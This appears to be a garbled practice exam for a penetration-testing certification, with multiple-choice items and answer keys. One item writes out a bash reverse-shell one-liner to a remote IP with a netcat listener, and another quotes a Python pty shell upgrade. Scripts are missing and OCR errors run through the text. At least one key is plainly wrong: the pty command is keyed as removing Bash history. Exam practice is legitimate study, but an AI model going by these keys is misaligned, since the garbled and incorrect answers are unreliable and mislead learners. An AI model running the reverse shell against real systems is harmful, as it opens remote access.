PT0-001 Free Practice Test

Given the following script:
<>

1. A. Log collection
2. B. Event logging
3. C. Keystroke monitoring
4. D. Debug message collection

Correct Answer: C

A penetration tester runs the following from a compromised box 'python -c -import pty;Pty.sPawn( "/bin/bash").' Which of the following actions is the tester taking?

1. A. Removing the Bash history
2. B. Upgrading the shell
3. C. Creating a sandbox
4. D. Capturing credentials

Correct Answer: A

A security consultant is trying to attack a device with a previous identified user account.
<>

1. A. Credential dump attack
2. B. DLL injection attack
3. C. Reverse shell attack
4. D. Pass the hash attack

Correct Answer: D

A tester intends to run the following command on a target system:
bash -i >& /dev/tcp/10.2.4.6/443 0>&1
Which of the following additional commands would need to be executed on the tester's Linux system.o make (he pre*ous command success?

1. A. nc -nvlp 443
2. B. nc 10.2.4.6 443
3. C. nc -w3 10.2.4.6 443
4. D. nc-/bin/ah 10.2.4.6 443

Correct Answer: A

A penetration tester is designing a phishing campaign and wants to build list of users (or the target organization. Which of the following techniques would be the MOST appropriate? (Select TWO)

1. A. Query an Internet WHOIS database.
2. B. Search posted job listings.
3. C. Scrape the company website.
4. D. Harvest users from social networking sites.
5. E. Socially engineer the corporate call cente

Correct Answer: AB